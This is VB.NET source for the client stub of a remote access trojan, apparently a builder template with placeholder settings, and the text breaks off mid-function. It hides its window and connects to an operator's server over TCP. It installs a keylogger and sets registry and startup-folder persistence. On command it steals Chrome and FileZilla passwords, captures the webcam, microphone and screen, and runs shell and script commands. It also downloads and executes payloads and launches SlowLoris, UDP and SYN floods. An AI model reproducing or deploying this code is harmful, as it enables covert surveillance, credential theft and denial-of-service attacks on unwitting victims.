gggggggggggggggggg

1. Imports System.Windows
2. Imports System
3. Imports System.Windows.Forms
4. Imports System.Windows.Forms.Form
5. Imports Microsoft.VisualBasic
6. Imports System.Reflection
7. Imports System.Net
8. Imports System.Net.Sockets
9. Imports System.Threading
10. Imports System.IO
11. Imports System.Runtime.InteropServices
12. Imports System.Management
13. Imports System.Text.RegularExpressions
14. Imports System.Text
15. Imports Microsoft.Win32
16. Imports System.Net.NetworkInformation
17. Imports System.Drawing
18. Imports System.ServiceProcess
19.  
20. <Assembly: AssemblyTitle("ASSEMBLYTITLE")>
21. <Assembly: AssemblyDescription("ASSEMBLYDESCRIPTION")>
22. <Assembly: AssemblyCompany("ASSEMBLYCOMPANY")>
23. <Assembly: AssemblyProduct("ASSEMBLYPRODUCT")>
24. <Assembly: AssemblyCopyright("ASSEMBLYCOPYRIGHT")>
25. <Assembly: AssemblyTrademark("ASSEMBLYTRADEMARK")>
26. <Assembly: AssemblyVersion("3.5.2.4")>
27. <Assembly: AssemblyFileVersion("0.0.0.0")>
28.  
29. Namespace MyApp
30. Public Class EntryPoint
31. Public Shared Sub Main(args As [String]())
32. Dim FrmMain As New Form1
33. FrmMain.Size = New System.Drawing.Size(0, 0)
34. FrmMain.ShowInTaskbar = False
35. FrmMain.Visible = False
36. FrmMain.Opacity = 0
37. System.Windows.Forms.Application.Run(FrmMain)
38. End Sub
39. End Class
40. Public Class Form1
41. Inherits System.Windows.Forms.Form
42. Dim client As TcpClient
43. Dim Connection As Thread
44. Dim enckey As String = "magic_key"
45. Dim screensending As Thread
46. Dim comp As Long
47. Dim res As String
48. Private Declare Function SetCursorPos Lib "user32" (ByVal X As Integer, ByVal Y As Integer) As Integer
49. Public Declare Sub mouse_event Lib "user32" Alias "mouse_event" (ByVal dwFlags As Integer, ByVal dx As Integer, ByVal dy As Integer, ByVal cButtons As Integer, ByVal dwExtraInfo As Integer)
50. Private Const MOUSEEVENTF_LEFTDOWN As Object = &H2
51. Private Const MOUSEEVENTF_LEFTUP As Object = &H4
52. Private Const MOUSEEVENTF_RIGHTDOWN As Object = &H8
53. Private Const MOUSEEVENTF_RIGHTUP As Object = &H10
54. Dim sl As New SlowLoris
55. Private Declare Function GetForegroundWindow Lib "user32.dll" () As Int32
56. Private Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As Int32, ByVal lpString As String, ByVal cch As Int32) As Int32
57. Dim WithEvents logger As New Keylogger
58. Dim logs As String
59. Dim strin As String
60. Dim curntdir2 As String
61. Dim listviewfiles As New ListView
62. Dim tbmessage As New TextBox
63. Dim rtblogs As New RichTextBox
64. Dim chat As New Form
65. Dim discomousing As Thread
66. #Region "Fun Declerations"
67. Private Declare Function SystemParametersInfo Lib "user32" Alias "SystemParametersInfoA" (ByVal uAction As Integer, ByVal uParam As Integer, ByVal lpvParam As String, ByVal fuWinIni As Integer) As Integer
68. Private Const SETDESKWALLPAPER As Integer = 20
69. Private Const UPDATEINIFILE As Long = &H1
70. Declare Function GetDesktopWindow Lib "user32" () As Long
71. Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Integer) As Long
72. Public Const WM_SYSCOMMAND As Long = &H112&
73. Public Const SC_SCREENSAVE As Long = &HF140&
74. Private Declare Function SwapMouseButton& Lib "user32" (ByVal bSwap As Long)
75. Private Declare Function SystemParametersInfo Lib "user32" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Integer, ByVal lpvParam As Long, ByVal fuWinIni As Long) As Long
76. Declare Function mciSend Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpszCommand As String, ByVal lpszReturnString As String, ByVal cchReturnLength As Long, ByVal hwndCallback As Long) As Long
77. Private Declare Function FindWindow Lib "user32.dll" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Int32
78. Private Declare Function ShowWindow Lib "user32.dll" (ByVal hwnd As IntPtr, ByVal nCmdShow As Int32) As Int32
79. Private Const SW_HIDE As Int32 = 0
80. Private Const SW_RESTORE As Int32 = 9
81. Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
82. Private Const SWP_HIDEWINDOW As Long = &H80
83. Private Const SWP_SHOWWINDOW As Long = &H40
84. #End Region
85. <DllImport("winmm.dll")> _
86. Private Shared Function mciSendString(ByVal command As String, ByVal buffer As StringBuilder, ByVal bufferSize As Integer, ByVal hwndCallback As IntPtr) As Integer
87. End Function
88. #Region "Webcam Declerations"
89. Dim picCapture As New PictureBox
90. Const WM_CAP As Short = &H400S
91. Const WM_CAP_DRIVER_CONNECT As Integer = WM_CAP + 10
92. Const WM_CAP_DRIVER_DISCONNECT As Integer = WM_CAP + 11
93. Const WM_CAP_EDIT_COPY As Integer = WM_CAP + 30
94. Const WM_CAP_SET_PREVIEW As Integer = WM_CAP + 50
95. Const WM_CAP_SET_PREVIEWRATE As Integer = WM_CAP + 52
96. Const WM_CAP_SET_SCALE As Integer = WM_CAP + 53
97. Const WS_CHILD As Integer = &H40000000
98. Const WS_VISIBLE As Integer = &H10000000
99. Const SWP_NOMOVE As Short = &H2S
100. Const SWP_NOSIZE As Short = 1
101. Const SWP_NOZORDER As Short = &H4S
102. Const HWND_BOTTOM As Short = 1
103. Dim iDevice As Integer = 0
104. Dim hHwnd As Integer
105. Declare Function SendWebcam Lib "user32" Alias "SendMessageA" (ByVal hwnd As Integer, ByVal wMsg As Integer, ByVal wParam As Integer, ByVal lParam As Object) As Integer
106. Declare Function SetWebcamPos Lib "user32" Alias "SetWindowPos" (ByVal hwnd As Integer, ByVal hWndInsertAfter As Integer, ByVal x As Integer, ByVal y As Integer, ByVal cx As Integer, ByVal cy As Integer, ByVal wFlags As Integer) As Integer
107. Declare Function DestroyWebcam Lib "user32" (ByVal hndw As Integer) As Boolean
108. Declare Function capCreateCaptureWindowA Lib "avicap32.dll" (ByVal lpszWindowName As String, ByVal dwStyle As Integer, ByVal x As Integer, ByVal y As Integer, ByVal nWidth As Integer, ByVal nHeight As Short, ByVal hWndParent As Integer, ByVal nID As Integer) As Integer
109. Declare Function capGetDriverDescriptionA Lib "avicap32.dll" (ByVal wDriver As Short, ByVal lpszName As String, ByVal cbName As Integer, ByVal lpszVer As String, ByVal cbVer As Integer) As Boolean
110. Dim webcamsending As Thread
111. #End Region
112. Dim installenable, dropinsubfolder, startupenable, startupdir, startupuser, startuplocal, regpersistence, melt, delay As Boolean
113. Dim dropsubfoldername, dropname, path As String
114. Dim delaytime As Integer
115. Dim WithEvents reg As New RegistryWatcher
116. Dim objMutex As Mutex
117. Sub New()
118. logger.CreateHook()
119. End Sub
120. #Region "Connection"
121. Sub Connect()
122. TryAgain:
123. Try
124. client = New TcpClient("IPFUCKINGADDRESS", 4431)
125. Send(AES_Encrypt("NewConnection|" & GetInfo() & "|" & SystemInformation.UserName.ToString() & "|" & SystemInformation.ComputerName.ToString() & "|" & My.Computer.Info.OSFullName & "|" & My.Computer.Info.OSVersion & "|" & getpriv(), enckey))
126. client.GetStream().BeginRead(New Byte() {0}, 0, 0, AddressOf Read, Nothing)
127. Catch ex As Exception
128. GoTo TryAgain
129. End Try
130. End Sub
131. Sub Read(ByVal ar As IAsyncResult)
132. Dim message As String
133. Try
134. Dim reader As New StreamReader(client.GetStream())
135. message = reader.ReadLine()
136. message = AES_Decrypt(message, enckey)
137. parse(message)
138. client.GetStream().BeginRead(New Byte() {0}, 0, 0, AddressOf Read, Nothing)
139. Catch ex As Exception
140. Threading.Thread.Sleep(4000)
141. Connect()
142. End Try
143. End Sub
144. Public Sub Send(ByVal message As String)
145. Try
146. Dim writer As New StreamWriter(client.GetStream())
147. writer.WriteLine(message)
148. writer.Flush()
149. Catch
150. End Try
151. End Sub
152. Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
153. Try
154. objMutex = New Mutex(False, "SINGLE_INSTANCE_APP_MUTEX")
155. If objMutex.WaitOne(0, False) = False Then
156. objMutex.Close()
157. objMutex = Nothing
158. Application.ExitThread()
159. End
160. End If
161.  
162. installenable = VEKEGFZKE
163. dropinsubfolder = BCIEZTC
164. dropsubfoldername = "VJKFZGUIZG"
165. startupenable = BCHJEIK
166. startupdir = GERIU
167. startupuser = BURE
168. startuplocal = IUEQ
169. regpersistence = GTUIER
170. melt = BEUORF
171. delay = VWIUF
172. dropname = "GUER"
173. path = "HFFguD"
174. delaytime = GTREIGTF
175.  
176. If delay = True Then
177. System.Threading.Thread.Sleep(delaytime * 1000)
178. End If
179.  
180. If Application.ExecutablePath.Contains("Temp") Or Application.ExecutablePath.Contains("AppData") Or Application.ExecutablePath.Contains("Program") Then
181. GoTo 1
182. End If
183.  
184. If installenable = True Then
185. If dropinsubfolder = True Then
186. If Not My.Computer.FileSystem.DirectoryExists(getPath(path) & "\" & dropsubfoldername) Then
187. My.Computer.FileSystem.CreateDirectory(getPath(path) & "\" & dropsubfoldername)
188. End If
189. IO.File.WriteAllBytes(getPath(path) & "\" & dropsubfoldername & "\" & dropname, IO.File.ReadAllBytes(Application.ExecutablePath))
190. domelt(getPath(path) & "\" & dropsubfoldername & "\" & dropname)
191. Exit Sub
192. Else
193. IO.File.WriteAllBytes(getPath(path) & "\" & dropname, IO.File.ReadAllBytes(Application.ExecutablePath))
194. domelt(getPath(path) & "\" & dropname)
195. Exit Sub
196. End If
197. End If
198.  
199. 1: If startupenable = True Then
200. If startupdir = True Then
201. Dim nam As String = New IO.FileInfo(Application.ExecutablePath).Name
202. IO.File.WriteAllBytes(Environment.GetFolderPath(Environment.SpecialFolder.Startup).ToString & "\" & nam, IO.File.ReadAllBytes(Application.ExecutablePath))
203. ElseIf startupuser = True Then
204. Dim regkey As RegistryKey
205. regkey = Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
206. regkey.SetValue(New IO.FileInfo(Application.ExecutablePath).Name.Replace(".exe", ""), Chr(34) & Application.ExecutablePath & Chr(34))
207. ElseIf startuplocal = True Then
208. Dim regkey As RegistryKey
209. regkey = Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
210. regkey.SetValue(New IO.FileInfo(Application.ExecutablePath).Name.Replace(".exe", ""), Chr(34) & Application.ExecutablePath & Chr(34))
211. If regpersistence = True Then
212. reg.AddWatcher(RegistryWatcher.HKEY_ROOTS.HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run", New IO.FileInfo(Application.ExecutablePath).Name.Replace(".exe", ""))
213. End If
214. End If
215. End If
216.  
217. If melt = True Then
218. SetAttr(Application.ExecutablePath, FileAttribute.Hidden)
219. End If
220.  
221. Connection = New Thread(AddressOf Connect)
222. Connection.Start()
223. Catch
224. End Try
225. End Sub
226. Sub parse(ByVal msg As String)
227. Try
228. If msg = "Disconnected" Then
229. Connection.Abort()
230. Connection = New Thread(AddressOf Connect)
231. Connection.Start()
232. ElseIf msg = "SystemInformation" Then
233. Send(AES_Encrypt("SystemInformation|" & getsystem() & GetDeepInfo(), enckey))
234. ElseIf msg = "GetProcess" Then
235. sendprocess()
236. ElseIf msg.StartsWith("Kill") Then
237. KillProcesses(msg)
238. ElseIf msg.StartsWith("New") Then
239. System.Diagnostics.Process.Start(msg.Split("|")(1))
240. ElseIf msg = "Software" Then
241. getinstalledsoftware()
242. ElseIf msg.StartsWith("RD") Then
243. comp = msg.Split("|")(1)
244. res = msg.Split("|")(2)
245. screensending = New Thread(AddressOf sendscreen)
246. screensending.Start()
247. ElseIf msg = "Stop" Then
248. screensending.Abort()
249. ElseIf msg = "GetPcBounds" Then
250. Send(AES_Encrypt("PCBounds" & My.Computer.Screen.Bounds.Height & "x" & My.Computer.Screen.Bounds.Width, enckey))
251. ElseIf msg.Contains("SetCurPos") Then
252. MouseMov(msg)
253. ElseIf msg.StartsWith("OpenWebsite") Then
254. openwebsite(msg.Replace("OpenWebsite", ""))
255. ElseIf msg.StartsWith("DandE") Then
256. dande(msg.Replace("DandE", ""))
257. ElseIf msg.StartsWith("MSG") Then
258. MessageBox.Show(GetBetween(msg, "Body: ", " Icon:", 0), GetBetween(msg, "Title: ", " Body:", 0), MessageBoxButton(GetBetween(msg, "Button: ", " End", 0)), MessageBoxIcn(GetBetween(msg, "Icon: ", " Button:", 0)))
259. ElseIf msg = "GetHostsFile" Then
260. loadhostsfile()
261. ElseIf msg.StartsWith("SaveHostsFile") Then
262. savehostsfile(msg.Replace("SaveHostsFile", ""))
263. ElseIf msg = "GetCPImage" Then
264. getclipboardimage()
265. ElseIf msg = "GetCPText" Then
266. getclipboardtext()
267. ElseIf msg.StartsWith("SaveCPText") Then
268. setclipboardtext(msg.Replace("SaveCPText", ""))
269. ElseIf msg.StartsWith("Shell") Then
270. runshell(msg.Replace("Shell", ""))
271. ElseIf msg = "GetKeyLogs" Then
272. Send(AES_Encrypt("KeyLogs" & logs, enckey))
273. ElseIf msg = "DelKeyLogs" Then
274. logs = ""
275. ElseIf msg = "RecordingStart" Then
276. audio_start()
277. ElseIf msg = "RecordingStop" Then
278. audio_stop()
279. ElseIf msg = "RecordingDownload" Then
280. audio_get()
281. ElseIf msg = "GetPasswords" Then
282. Main.GetChrome()
283. Send(AES_Encrypt("Passwords" & Main.lol & FileZilla(), enckey))
284. ElseIf msg = "GetTCPConnections" Then
285. Send(AES_Encrypt("TCPConnections" & GetTCPConnections(), enckey))
286. ElseIf msg.StartsWith("GetStartup") Then
287. GetStartupEntries()
288. ElseIf msg.StartsWith("UpdateFromLink") Then
289. UpdatefromLink(msg.Replace("UpdateFromLink", ""))
290. ElseIf msg.StartsWith("UpdatefromFile") Then
291. UpdateFromFile(msg.Replace("UpdatefromFile", ""))
292. ElseIf msg.StartsWith("ExecuteFromLink") Then
293. ExecutefromLink(msg.Replace("ExecuteFromLink", ""))
294. ElseIf msg.StartsWith("ExecutefromFile") Then
295. ExecutefromFile(msg.Replace("ExecutefromFile", ""))
296. ElseIf msg = "Restart" Then
297. rstart()
298. ElseIf msg = "Uninstall" Then
299. delete(3)
300. ElseIf msg.StartsWith("RemovefromStartup") Then
301. removefromstartup(msg.Replace("RemovefromStartup", ""))
302. ElseIf msg = "ListDrives" Then
303. listdrives()
304. ElseIf msg.StartsWith("ListFiles") Then
305. showfiles(msg.Replace("ListFiles", ""))
306. ElseIf msg.Contains("mkdir") Then
307. createnewdirectory(msg.Replace("mkdir", ""))
308. ElseIf msg.Contains("rmdir") Then
309. deletedirectory(msg.Replace("rmdir", ""))
310. ElseIf msg.Contains("rnfolder") Then
311. renamedirectory(msg.Replace("rnfolder", "").Split("|")(0), msg.Replace("rnfolder", "").Split("|")(1))
312. ElseIf msg.Contains("mvdir") Then
313. movedirectory(msg.Replace("mvdir", "").Split("|")(0), msg.Replace("mvdir", "").Split("|")(1), msg.Replace("mvdir", "").Split("|")(2))
314. ElseIf msg.Contains("cpdir") Then
315. copydirectory(msg.Replace("cpdir", "").Split("|")(0), msg.Replace("cpdir", "").Split("|")(1), msg.Replace("cpdir", "").Split("|")(2))
316. ElseIf msg.Contains("mkfile") Then
317. CreateNewFile(msg)
318. ElseIf msg.Contains("rmfile") Then
319. deletefile(msg.Replace("rmfile", "").Split("|")(0))
320. ElseIf msg.Contains("rnfile") Then
321. renamefile(msg.Replace("rnfile", "").Split("|")(0), msg.Replace("rnfile", "").Split("|")(1))
322. ElseIf msg.Contains("movefile") Then
323. movefile(msg.Replace("movefile", "").Split("|")(0), msg.Replace("movefile", "").Split("|")(1), msg.Replace("move", "").Split("|")(2))
324. ElseIf msg.Contains("copyfile") Then
325. copyfile(msg.Replace("copyfile", "").Split("|")(0), msg.Replace("copyfile", "").Split("|")(1), msg.Replace("copyfile", "").Split("|")(2))
326. ElseIf msg.StartsWith("sharefile") Then
327. sharefile(msg.Replace("sharefile", ""))
328. ElseIf msg.StartsWith("FileUpload") Then
329. UploadFile(msg.Replace("FileUpload", ""))
330. ElseIf msg = "ListWebcamDevices" Then
331. listdevices()
332. ElseIf msg = "WebcamStart" Then
333. webcamsending = New Thread(AddressOf getwebcam)
334. webcamsending.Start()
335. ElseIf msg.StartsWith("SlowLorisStart") Then
336. StartSlowLoris(msg.Replace("SlowLorisStart", ""))
337. ElseIf msg.StartsWith("SlowLorisStop") Then
338. sl.StopFlood()
339. ElseIf msg.StartsWith("UDPStart") Then
340. StartUDP(msg.Replace("UDPStart", ""))
341. ElseIf msg = "UDPStop" Then
342. If UDPFlood.FloodRunning = True Then
343. UDPFlood.StopUDPFlood()
344. End If
345. ElseIf msg.StartsWith("SYNStart") Then
346. StartSYN(msg.Replace("SYNStart", ""))
347. ElseIf msg = "SYNStop" Then
348. If SynFlood.IsRunning = True Then
349. SynFlood.StopSynFlood()
350. End If
351. ElseIf msg.StartsWith("HTMLScripting") Then
352. IO.File.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\FBqINhRdpgnqATxJ.html", msg.Replace("HTMLScripting", ""))
353. System.Diagnostics.Process.Start(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\FBqINhRdpgnqATxJ.html")
354. ElseIf msg.StartsWith("VBSScripting") Then
355. IO.File.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\UjfAPUFPaUkAqQTZ.vbs", msg.Replace("VBSScripting", ""))
356. System.Diagnostics.Process.Start(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\UjfAPUFPaUkAqQTZ.vbs")
357. ElseIf msg.StartsWith("BATScripting") Then
358. IO.File.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\X53DNwMsMwjtC9JW.bat", msg.Replace("BATScripting", ""))
359. System.Diagnostics.Process.Start(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\X53DNwMsMwjtC9JW.bat")
360. ElseIf msg.StartsWith("GetThumbNails") Then
361. SendThumbNail()
362. ElseIf msg.Contains("Website") Then
363. openwebsite(msg.Split("|")(1))
364. ElseIf msg.Contains("logoff") Then
365. Shell("shutdown /l")
366. ElseIf msg.Contains("shutdwn") Then
367. Shell("shutdown /s")
368. ElseIf msg.Contains("restrt") Then
369. Shell("shutdown /r")
370. ElseIf msg.Contains("Change") Then
371. My.Computer.Network.DownloadFile(msg.Split("|")(0), My.Computer.FileSystem.SpecialDirectories.Temp.ToString & "\wallpaper.jpg")
372. SystemParametersInfo(SETDESKWALLPAPER, 0, My.Computer.FileSystem.SpecialDirectories.Temp.ToString & "\wallpaper.jpg", UPDATEINIFILE)
373. ElseIf msg.Contains("Spk") Then
374. Dim SAPI As Object
375. SAPI = CreateObject("SAPI.spvoice")
376. SAPI.Speak(msg.Split("|")(1).ToString)
377. ElseIf msg.Contains("UndoMouse") Then
378. SwapMouseButton(False)
379. ElseIf msg.Contains("SwapMouse") Then
380. SwapMouseButton(True)
381. ElseIf msg = "CloseCD" Then
382. mciSend("set CDAudio door closed", 0, 0, 0)
383. ElseIf msg = "OpenCD" Then
384. mciSend("set CDAudio door open", 0, 0, 0)
385. ElseIf msg.Contains("ShowIcons") Then
386. Dim hWnd As IntPtr
387. hWnd = FindWindow(vbNullString, "Program Manager")
388. If Not hWnd = 0 Then
389. ShowWindow(hWnd, SW_RESTORE)
390. End If
391. ElseIf msg.Contains("HideIcons") Then
392. Dim hWnd As IntPtr
393. hWnd = FindWindow(vbNullString, "Program Manager")
394. If Not hWnd = 0 Then
395. ShowWindow(hWnd, SW_HIDE)
396. End If
397. ElseIf msg.Contains("ShowTaskbar") Then
398. ShowTaskBar()
399. ElseIf msg.Contains("HideTaskbar") Then
400. HideTaskBar()
401. ElseIf msg = "StartDiscoMouse" Then
402. discomousing = New Thread(AddressOf discomouse)
403. discomousing.Start()
404. ElseIf msg = "StopDiscoMouse" Then
405. discomousing.Abort()
406. ElseIf msg = "WebcamStop" Then
407. webcamsending.Abort()
408. ElseIf msg = "GetServices" Then
409. SendServices()
410. ElseIf msg.StartsWith("ServiceAction") Then
411. Dim res As String = msg.Replace("ServiceAction", "")
412. PerformServiceAction(res.Split("|")(0), res.Split("|")(1))
413. End If
414. Catch
415. End Try
416. End Sub
417. Function getPath(ByVal input As String) As String
418. Select Case input
419. Case "Appdata Local"
420. Return Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData).ToString()
421. Case "Appdata Roaming"
422. Return Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData).ToString()
423. Case "Temp"
424. Return My.Computer.FileSystem.SpecialDirectories.Temp.ToString()
425. Case "Program Files"
426. Return Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles).ToString()
427. Case "Programs"
428. Return Environment.GetFolderPath(Environment.SpecialFolder.Programs).ToString()
429. Case Else : Return Nothing
430. End Select
431. End Function
432. Sub domelt(ByVal path As String)
433. Try
434. Dim p As New System.Diagnostics.ProcessStartInfo("cmd.exe")
435. p.Arguments = "/C ping 1.1.1.1 -n 1 -w " & 3 & " > Nul & Del " & ControlChars.Quote & Application.ExecutablePath & ControlChars.Quote & "&" & ControlChars.Quote & path & ControlChars.Quote
436. p.CreateNoWindow = True
437. p.ErrorDialog = False
438. p.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
439. System.Diagnostics.Process.Start(p)
440. Application.Exit()
441. Catch
442. End Try
443. End Sub
444. Private Sub reg_RegistryChanged(M As RegistryWatcher.Monitor) Handles reg.RegistryChanged
445. Try
446. Dim regkey As RegistryKey
447. regkey = Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
448. regkey.SetValue(New IO.FileInfo(Application.ExecutablePath).Name.Replace(".exe", ""), Chr(34) & Application.ExecutablePath & Chr(34))
449. Catch
450. End Try
451. End Sub
452. #End Region
453. #Region "Others"
454. Sub discomouse()
455. Try
456. Do
457. Dim mousepos As New System.Drawing.Point
458. mousepos.X = New Random().Next(0, My.Computer.Screen.Bounds.Height)
459. mousepos.Y = New Random().Next(0, My.Computer.Screen.Bounds.Width)
460. System.Windows.Forms.Cursor.Position = mousepos
461. Loop
462. Catch
463. End Try
464. End Sub
465. Sub KillProcesses(ByVal txt As String)
466. Try
467. txt = txt.Replace("Kill|", "")
468.  
469. For i As Integer = 0 To CountCharacter(txt, "|")
470. System.Diagnostics.Process.GetProcessesByName(txt.Split("|")(i).Remove(txt.Split("|")(i).Length - 4, 4))(0).CloseMainWindow()
471. Next
472. Catch
473. End Try
474. End Sub
475. Public Function CountCharacter(ByVal value As String, ByVal ch As Char) As Integer
476. Try
477. Dim cnt As Integer = 0
478. For Each c As Char In value
479. If c = ch Then cnt += 1
480. Next
481. Return cnt
482. Catch
483. Return Nothing
484. End Try
485. End Function
486. Sub openwebsite(ByVal url As String)
487. Try
488. System.Diagnostics.Process.Start(url)
489. Catch : End Try
490. End Sub
491. Sub dande(ByVal url As String)
492. Try
493. Dim web As New WebClient
494. web.DownloadFile(url, My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\file.exe")
495. Shell(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\file.exe")
496. Catch
497. End Try
498. End Sub
499. Private Function GetBetween(ByVal input As String, ByVal str1 As String, ByVal str2 As String, ByVal index As Integer) As String
500. Dim temp As String = Regex.Split(input, str1)(index + 1)
501. Return Regex.Split(temp, str2)(0)
502. End Function
503. Function MessageBoxButton(ByVal Text As String) As Object
504. Select Case Text
505. Case "AbortRetryIgnore"
506. Return MessageBoxButtons.AbortRetryIgnore
507. Case "OK"
508. Return MessageBoxButtons.OK
509. Case "OKCancel"
510. Return MessageBoxButtons.OKCancel
511. Case "RetryCancel"
512. Return MessageBoxButtons.RetryCancel
513. Case "YesNo"
514. Return MessageBoxButtons.YesNo
515. Case "YesNoCancel"
516. Return MessageBoxButtons.YesNoCancel
517. Case Else
518. Return MessageBoxButtons.OK
519. End Select
520. End Function
521. Function MessageBoxIcn(ByVal text As String) As Object
522. Select Case text
523. Case "Asterisk"
524. Return MessageBoxIcon.Asterisk
525. Case "Error"
526. Return MessageBoxIcon.Error
527. Case "Exclamation"
528. Return MessageBoxIcon.Exclamation
529. Case "Hand"
530. Return MessageBoxIcon.Hand
531. Case "Information"
532. Return MessageBoxIcon.Information
533. Case "None"
534. Return MessageBoxIcon.None
535. Case "Question"
536. Return MessageBoxIcon.Question
537. Case "Stop"
538. Return MessageBoxIcon.Stop
539. Case "Warning"
540. Return MessageBoxIcon.Warning
541. Case Else
542. Return MessageBoxIcon.None
543. End Select
544. End Function
545. Sub UpdatefromLink(ByVal url As String)
546. Try
547. My.Computer.Network.DownloadFile(url, My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\updated.exe")
548. Dim p As New System.Diagnostics.ProcessStartInfo("cmd.exe")
549. p.Arguments = "/C ping 1.1.1.1 -n 1 -w 5 > Nul & Del " & ControlChars.Quote & Application.ExecutablePath & ControlChars.Quote
550. p.CreateNoWindow = True
551. p.ErrorDialog = False
552. p.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
553.  
554. Dim pp As New System.Diagnostics.ProcessStartInfo("cmd.exe")
555. pp.Arguments = "/C ping 1.1.1.1 -n 1 -w 5 > Nul & " & ControlChars.Quote & My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\updated.exe" & ControlChars.Quote
556. pp.CreateNoWindow = True
557. pp.ErrorDialog = False
558. pp.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
559.  
560. System.Diagnostics.Process.Start(p)
561. System.Diagnostics.Process.Start(pp)
562.  
563. Application.Exit()
564. Catch
565. End Try
566. End Sub
567. Sub UpdateFromFile(ByVal txt As String)
568. Try
569. File.WriteAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\updated.exe", Convert.FromBase64String(txt))
570. Dim p As New System.Diagnostics.ProcessStartInfo("cmd.exe")
571. p.Arguments = "/C ping 1.1.1.1 -n 1 -w 5 > Nul & Del " & ControlChars.Quote & Application.ExecutablePath & ControlChars.Quote
572. p.CreateNoWindow = True
573. p.ErrorDialog = False
574. p.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
575.  
576. Dim pp As New System.Diagnostics.ProcessStartInfo("cmd.exe")
577. pp.Arguments = "/C ping 1.1.1.1 -n 1 -w 5 > Nul & " & ControlChars.Quote & My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\updated.exe" & ControlChars.Quote
578. pp.CreateNoWindow = True
579. pp.ErrorDialog = False
580. pp.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
581.  
582. System.Diagnostics.Process.Start(p)
583. System.Diagnostics.Process.Start(pp)
584.  
585. Application.Exit()
586. Catch
587. End Try
588. End Sub
589. Sub ExecutefromLink(ByVal url As String)
590. Try
591. My.Computer.Network.DownloadFile(url, My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\exec.exe")
592. Shell(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\exec.exe")
593. Catch
594. End Try
595. End Sub
596. Sub ExecutefromFile(ByVal txt As String)
597. Try
598. File.WriteAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\exec.exe", Convert.FromBase64String(txt))
599. Shell(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\exec.exe")
600. Catch
601. End Try
602. End Sub
603. Sub rstart()
604. Try
605. Dim p As New System.Diagnostics.ProcessStartInfo("cmd.exe")
606. p.Arguments = "/C ping 1.1.1.1 -n 1 -w 15 > Nul & " & ControlChars.Quote & Application.ExecutablePath & ControlChars.Quote
607. p.CreateNoWindow = True
608. p.ErrorDialog = False
609. p.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
610. System.Diagnostics.Process.Start(p)
611. Application.Exit()
612. Catch
613. End Try
614. End Sub
615. Sub delete(ByVal timeout As Integer)
616. Try
617. SetAttr(Application.ExecutablePath, FileAttribute.Normal)
618. Dim p As New System.Diagnostics.ProcessStartInfo("cmd.exe")
619. p.Arguments = "/C ping 1.1.1.1 -n 1 -w " & timeout & " > Nul & Del " & ControlChars.Quote & Application.ExecutablePath & ControlChars.Quote
620. p.CreateNoWindow = True
621. p.ErrorDialog = False
622. p.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
623.  
624. If startuplocal = True then
625. Dim regkey As RegistryKey
626. regkey = Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
627. If regpersistence = True Then
628. reg.RemoveWatcher(New IO.FileInfo(Application.ExecutablePath).Name.Replace(".exe", ""))
629. End If
630. regkey.DeleteValue(New IO.FileInfo(Application.ExecutablePath).Name.Replace(".exe", ""))
631. End If
632.  
633. If startupuser = True then
634. Dim regkey As RegistryKey
635. regkey = Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
636. regkey.DeleteValue(New IO.FileInfo(Application.ExecutablePath).Name.Replace(".exe", ""))
637. End if
638.  
639. System.Diagnostics.Process.Start(p)
640. Application.Exit()
641. Catch ex As Exception
642. MsgBox(ex.Message)
643. End Try
644. End Sub
645. Sub removefromstartup(ByVal txt As String)
646. Try
647. If txt.StartsWith("C") Then
648. IO.File.Delete(txt.Replace("|", ""))
649. ElseIf txt.StartsWith("HKEY_CURRENT_USER") Then
650. txt = txt.Replace(txt.Split("\")(0) & "\", "")
651. Dim name As String = txt.Split("|")(1)
652. txt = txt.Replace("\|" & txt.Split("|")(1), "")
653. Dim regkey As RegistryKey = Registry.CurrentUser.OpenSubKey(txt, True)
654. regkey.DeleteValue(name)
655. regkey.Close()
